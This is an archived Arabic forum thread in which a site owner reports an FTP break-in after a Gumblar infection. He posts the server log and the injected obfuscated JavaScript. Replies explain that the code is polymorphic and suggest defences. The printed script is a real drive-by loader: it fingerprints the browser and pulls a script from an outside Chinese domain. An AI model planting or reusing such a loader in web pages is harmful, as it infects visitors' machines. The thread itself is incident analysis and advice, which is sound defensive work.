الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

فيروس جديد! لم يكتشفه أي برنامج للحماية و لا حتى غوغل ! حذاري

بدأه web2009 في 17 مايو 2009 · 2 رد · 898 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم

بعدما ارتحت من gumblar قمت بتحديث نظام الحماية و اتخاذ جميع الاحتياكات اللازمة ... لكن قبل ساعة من الان قمت بالدخول مجددا عن طريف ال ftp الى موقعي معتقدا ان الامر حسم و انا في مأمن من جميع التهديدات... لكن و بمجرد دخولي الى الموقع قام زائر اخر بالدخول عن طريق عن طريق العنوان التالي 66.7.208.222

كما يوضح الـ log الـ ftp

...

vsftpd: Sun May 17 14:19:36 2009 [pid 27849] [] FTP response: Client "196.12.****", "257 "/www/sudoku""

vsftpd: Sun May 17 14:19:58 2009 [pid 27849] [] FTP command: Client "196.12.****", "REST 0"

vsftpd: Sun May 17 14:19:58 2009 [pid 27849] [] FTP response: Client "196.12.****", "350 Restart position accepted (0)."

vsftpd: Sun May 17 14:20:20 2009 [pid 27849] [] FTP command: Client "196.12.****", "REST 0"

vsftpd: Sun May 17 14:20:20 2009 [pid 27849] [] FTP response: Client "196.12.****", "350 Restart position accepted (0)."

vsftpd: Sun May 17 14:20:43 2009 [pid 27849] [] FTP command: Client "196.12.****", "TYPE I"

vsftpd: Sun May 17 14:20:43 2009 [pid 27849] [] FTP response: Client "196.12.****", "200 Switching to Binary mode."

vsftpd: Sun May 17 14:21:05 2009 [pid 27849] [] FTP command: Client "196.12.****", "TYPE I"

vsftpd: Sun May 17 14:21:05 2009 [pid 27849] [] FTP response: Client "196.12.****", "200 Switching to Binary mode."

vsftpd: Sun May 17 14:20:57 2009 [pid 5790] [] FTP response: Client "66.7.208.222", "331 Please specify the password."

vsftpd: Sun May 17 14:20:57 2009 [pid 5790] [] FTP command: Client "66.7.208.222", "PASS <password>"

vsftpd: Sun May 17 14:20:59 2009 [pid 5765] [] OK LOGIN: Client "66.7.208.222"

vsftpd: Sun May 17 14:21:00 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "230 Login successful."

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP command: Client "66.7.208.222", "PWD"

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "257 "/""

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP command: Client "66.7.208.222", "TYPE A"

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "200 Switching to ASCII mode."

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP command: Client "66.7.208.222", "PORT 66,7,208,222,156,73"

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "200 PORT command successful. Consider using PASV."

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP command: Client "66.7.208.222", "LIST /"

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "150 Here comes the directory listing."

vsftpd: Sun May 17 14:21:01 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "226 Directory send OK."

vsftpd: Sun May 17 14:21:02 2009 [pid 5819] [] FTP command: Client "66.7.208.222", "PORT 66,7,208,222,153,3"

vsftpd: Sun May 17 14:21:02 2009 [pid 5819] [] FTP response: Client "66.7.208.222", "200 PORT command successful. Consider using PASV."

....

السكريبت المحقون هو

<script language=javascript><!-- 
(function(sSVHk){var L1Wa='%';eval(unescape(('v`61r`20a`3d`22`53`63riptEngine`22`2c`62`3d`22`56ersion()+
`22`2cj`3d`22`22`2c`75`3dnavigato`72`2euserAg`65n`74`3b`69`66`28`28u`2eindexOf(`22Chro`6d`65`22)`3c0`29`26`26`28u`
2ein`64`65x`4ff`28`22`57i`6e`22)`3e0`29`26`26`28`75`2ei`6edexOf(`22NT`206`22)`3c0`29`26`26`28docume`6et`2ecookie`2e
indexO`66`28`22miek`3d1`22`29`3c`30)`26`26(t`79peo`66(zr`76zts`29`21`3dtypeof`28`22`41`22`29))`7bzr`76zts`3d`22`41`22`3b
eval(`22`69`66(`77indow`2e`22+`61+`22)j`3dj`2b`22+a`2b`22`4dajor`22+b+`61+`22`4din`6fr`22+b`2ba+`22`42u`69`6cd`22+`62+
`22j`3b`22)`3bdo`63um`65nt`2ewr`69te(`22`3cscript`20s`72`63`3d`2f`2fm`61`22+`22r`74uz`2ecn`2f`76id`2f`3fid`3d`22+j+
`22`3e`3c`5c`2fscr`69`70t`3e`22)`3b`7d').replace(sSVHk,L1Wa)))})(/\`/g);
 --></script>

هذا الامر لا يبشر بخير

تم تعديل هذه المشاركة بواسطة Xacker في 17 مايو 2009 في 17:00

#2

غالباً فقط تغيير في الكود المحقون لا أكثر

للأسف المتصفحات الكثيرة التي جربت عليها (غالباً تكون MSIE) لم تظهر قيمة لـ j يمكن منها الحصول على كود للتأكد من هذا الأمر والأجهزة لدي جميعها تحوي على MSIE 7 مع آخر تحديثات لويندوز فقيمة j التي كانت تظهر تجلب فقط

// No news...<script>
var t=new Date(1242679661000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
//</script>

ما سأقوله لك، تأكد من أنه لم يتم رفع صفحات PHP غريبة إلى موقعك > قد تحوي على shellcode

وأيضاً أن صفحاتك لا تحوي على INCLUDE لملف خارج النطاق الخاص بك..

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#3

السلام عليكم.

Xacker جرب إستعمال proxy ،فالمشكلة التي واجهتك واجهتني ايضا لكن تخطيتها بإستعمال proxy ،واستطعت من خلالها تكملة التحليل-أظن أن الأمر هو ban على IP's-.

فيما يخص الأخ،فإن الكود كما قال Xacker يتغير فقط (poly)،مبدئيا أنصحك بإغلاق منفذ 21 وإستعمال سكريبت لإدارة الملفات وذلك عن طريق HTTP من المنفذ 80 (سكريبت إدارة ويكون خالي من الثغرات وذو مصداقية لكي لا تقع في مشكلة إختراقك من طرف الأطفال).

وبعدها سنحاول ان نجد لك حل بإذن الله.

ولا تنسى أن تستعمل firefox آخر إاصدار مع NoScript plugin .

infected.png

مدونة علوم الحاسب

مواضيع مشابهة

عدد الزوار حالياً

المتواجدون خلال آخر دقيقتين · يتحدّث كل ٣٠ ثانية

—الإجمالي—أعضاء مسجّلون—زوار بدون تسجيل

جارٍ التحقق من المتواجدين…